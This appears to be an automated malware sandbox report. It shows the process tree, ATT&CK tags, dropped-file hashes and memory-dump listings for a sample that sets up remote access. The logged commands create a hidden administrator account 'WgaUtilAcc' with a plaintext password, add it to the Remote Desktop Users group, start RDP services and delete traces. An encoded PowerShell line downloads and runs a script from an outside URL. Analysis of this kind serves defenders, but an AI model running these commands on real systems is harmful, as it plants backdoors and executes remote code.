      Suspicious use of WriteProcessMemory
      PID:4732
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        5⤵
        
        PID:4968
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:636
    - - C:\Windows\system32\cmd.exe
        
        cmd /c net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3572
      - C:\Windows\system32\net.exe
        
        net start rdpdr
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4572
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        7⤵
        
        PID:2324
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:996
    - - C:\Windows\system32\cmd.exe
        
        cmd /c net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3452
      - C:\Windows\system32\net.exe
        
        net start TermService
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1900
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        7⤵
        
        PID:2724
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      4⤵
      PID:4072
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
      4⤵
      PID:2228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:1028

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1628
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3264
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:2520

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc m1hgOfxo /add
1⤵
PID:2516
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc m1hgOfxo /add
  2⤵
  PID:1356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc m1hgOfxo /add
    3⤵
    PID:1132

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:2060
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:4108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:4816

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" JDQPXOPR$ /ADD
1⤵
PID:1476
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" JDQPXOPR$ /ADD
  2⤵
  PID:3936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JDQPXOPR$ /ADD
    3⤵
    PID:4020

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:4748
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:4468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:3716

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc m1hgOfxo
1⤵
PID:3828
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc m1hgOfxo
  2⤵
  PID:2920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc m1hgOfxo
    3⤵
    PID:3920

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2180
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4856

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:4920
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4872

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:3928
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3512

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1

MD5
37989f18e085ffe7543d67f3c6106cab

SHA1
a7e9fe3b23649f8ac426b41f9f44ad0a0885362f

SHA256
b47ecc70fb9e10ae65f10b5e998586dfe3f7efa202ef99612004dc7f82b15367

SHA512
b3ac492b26d94ac9526a8a64cf700989b84c5e4a088800ed8970a599b505b0deb1943f31d4fd0871d1d682023cd94ef17211b6204f792ebf387f447c87cb6a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe

MD5
909a1d386235dd5f6ba61b91ba34119d

SHA1
cee32dd2fca33ad540350fc83e651adfebae9c37

SHA256
d0f224023900420d0e541360144bfbfb03cbb936391ce6d3e98590ddca51bc6a

SHA512
4f3167f627c54f90a7cc703fd5b010989f94e0567c744ec493d973e6687c8925ba563235d98bb527eaa0454303934c33d5ec0021f3586e0ef0ad3e56eafc3942

Download Submit
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe

MD5
909a1d386235dd5f6ba61b91ba34119d

SHA1
cee32dd2fca33ad540350fc83e651adfebae9c37

SHA256
d0f224023900420d0e541360144bfbfb03cbb936391ce6d3e98590ddca51bc6a

SHA512
4f3167f627c54f90a7cc703fd5b010989f94e0567c744ec493d973e6687c8925ba563235d98bb527eaa0454303934c33d5ec0021f3586e0ef0ad3e56eafc3942

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5
de18e6dcc06056205667046694fe1378

SHA1
65f83166965fc71d8a16822daf5dbb0525019865

SHA256
0aa54a7c3202417924255339436ac92e230704c72b40ab4be399b98caa71d377

SHA512
aefd3b2dd3ffbf9f8884d81b5145fb4513eb61768970f17b4e1d1b9b8122c7c153ba8f331769234d2154da9427d4691a81e8b654bcbad829cda41fa5a1253842

Download Submit
C:\Windows\Branding\mediasrv.png

MD5
a64974bc045ea4e97a1cd167d2692749

SHA1
435ef4949b3a109b72ff763a8b34f35960f008cc

SHA256
f4c29e90b8a15ef0278fe9fc48c9077d795bbdcdaac3e2711f63a7eb2fde4b5a

SHA512
db1eaf9b0d0d411992ced7cfa6f1ae6ee974c445823888503ce9176f7f1a042c854c622926cfe97fefb5cfc2ed1d2a379c280aa4686e5de8e206fbca126d114f

Download Submit
C:\Windows\Branding\mediasvc.png

MD5
694371335efd2170cc0c667636c9801e

SHA1
a271b5281b5fc1701012b20e2f39e36d7375a773

SHA256
e326ca19f02b80099cfcf0ef3494a09166ddab22fc7fbefab1b13f3d85f7e406

SHA512
965ba9acf04e50a31b2323b28ab19fe2b8b5c5aa146cd3ee26a2f761c2e286b25b775fb96742d6975fc54d7edcde9fb2d743d65aca59b81507e028c260738304

Download Submit
C:\Windows\system32\rfxvmt.dll

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
memory/932-166-0x000001E743503000-0x000001E743505000-memory.dmp

Filesize
8KB

Download
memory/932-167-0x000001E743506000-0x000001E743508000-memory.dmp

Filesize
8KB

Download
memory/932-165-0x000001E743500000-0x000001E743502000-memory.dmp

Filesize
8KB

Download
memory/932-164-0x00007FF8198E3000-0x00007FF8198E5000-memory.dmp

Filesize
8KB

Download
memory/1028-149-0x00000152301C0000-0x00000152301C4000-memory.dmp

Filesize
16KB

Download
memory/1684-155-0x000002722F316000-0x000002722F318000-memory.dmp

Filesize
8KB

Download
memory/1684-156-0x000002722F318000-0x000002722F319000-memory.dmp

Filesize
4KB

Download
memory/1684-159-0x0000027248300000-0x000002724850A000-memory.dmp

Filesize
2.0MB

Download
memory/1684-150-0x00007FF8198E3000-0x00007FF8198E5000-memory.dmp

Filesize
8KB

Download
memory/1684-151-0x000002722F310000-0x000002722F312000-memory.dmp

Filesize
8KB

Download
memory/1684-152-0x000002722F313000-0x000002722F315000-memory.dmp

Filesize
8KB

Download
memory/1684-153-0x0000027247870000-0x0000027247892000-memory.dmp

Filesize
136KB

Download
memory/1684-158-0x0000027247F70000-0x00000272480E6000-memory.dmp

Filesize
1.5MB

Download
memory/2124-143-0x0000019B80513000-0x0000019B80515000-memory.dmp

Filesize
8KB

Download
memory/2124-136-0x0000000000400000-0x0000000000A6B000-memory.dmp

Filesize
6.4MB

Download
memory/2124-144-0x0000019B80515000-0x0000019B80516000-memory.dmp

Filesize
4KB

Download
memory/2124-141-0x00007FF8198E3000-0x00007FF8198E5000-memory.dmp

Filesize
8KB

Download
memory/2124-145-0x0000019B80516000-0x0000019B80517000-memory.dmp

Filesize
4KB

Download
memory/2124-138-0x0000000000400000-0x0000000000A6B000-memory.dmp

Filesize
6.4MB

Download
memory/2124-142-0x0000019B80510000-0x0000019B80512000-memory.dmp

Filesize
8KB

Download
memory/3148-162-0x0000022376E43000-0x0000022376E45000-memory.dmp

Filesize
8KB

Download
memory/3148-161-0x0000022376E40000-0x0000022376E42000-memory.dmp

Filesize
8KB

Download
memory/3148-163-0x0000022376E46000-0x0000022376E48000-memory.dmp

Filesize
8KB

Download
memory/3148-160-0x00007FF8198E3000-0x00007FF8198E5000-memory.dmp

Filesize
8KB

Download
memory/3512-171-0x00007FF8198E3000-0x00007FF8198E5000-memory.dmp

Filesize
8KB

Download
memory/3512-174-0x00000137D8DB6000-0x00000137D8DB8000-memory.dmp

Filesize
8KB

Download
memory/3512-173-0x00000137D8DB3000-0x00000137D8DB5000-memory.dmp

Filesize
8KB

Download
memory/3512-172-0x00000137D8DB0000-0x00000137D8DB2000-memory.dmp

Filesize
8KB

Download
memory/4452-140-0x0000010FC6420000-0x0000010FC6430000-memory.dmp

Filesize
64KB

Download
memory/4452-139-0x0000010FC5D70000-0x0000010FC5D80000-memory.dmp

Filesize
64KB

Download
memory/4452-146-0x0000010FC8AF0000-0x0000010FC8AF4000-memory.dmp

Filesize
16KB

Download
memory/4896-135-0x000000001DAA0000-0x000000001DAA2000-memory.dmp

Filesize
8KB

Download
memory/4896-133-0x0000000000D80000-0x00000000011B6000-memory.dmp

Filesize
4.2MB

Download
memory/4896-134-0x00007FF819DD3000-0x00007FF819DD5000-memory.dmp

Filesize
8KB

Download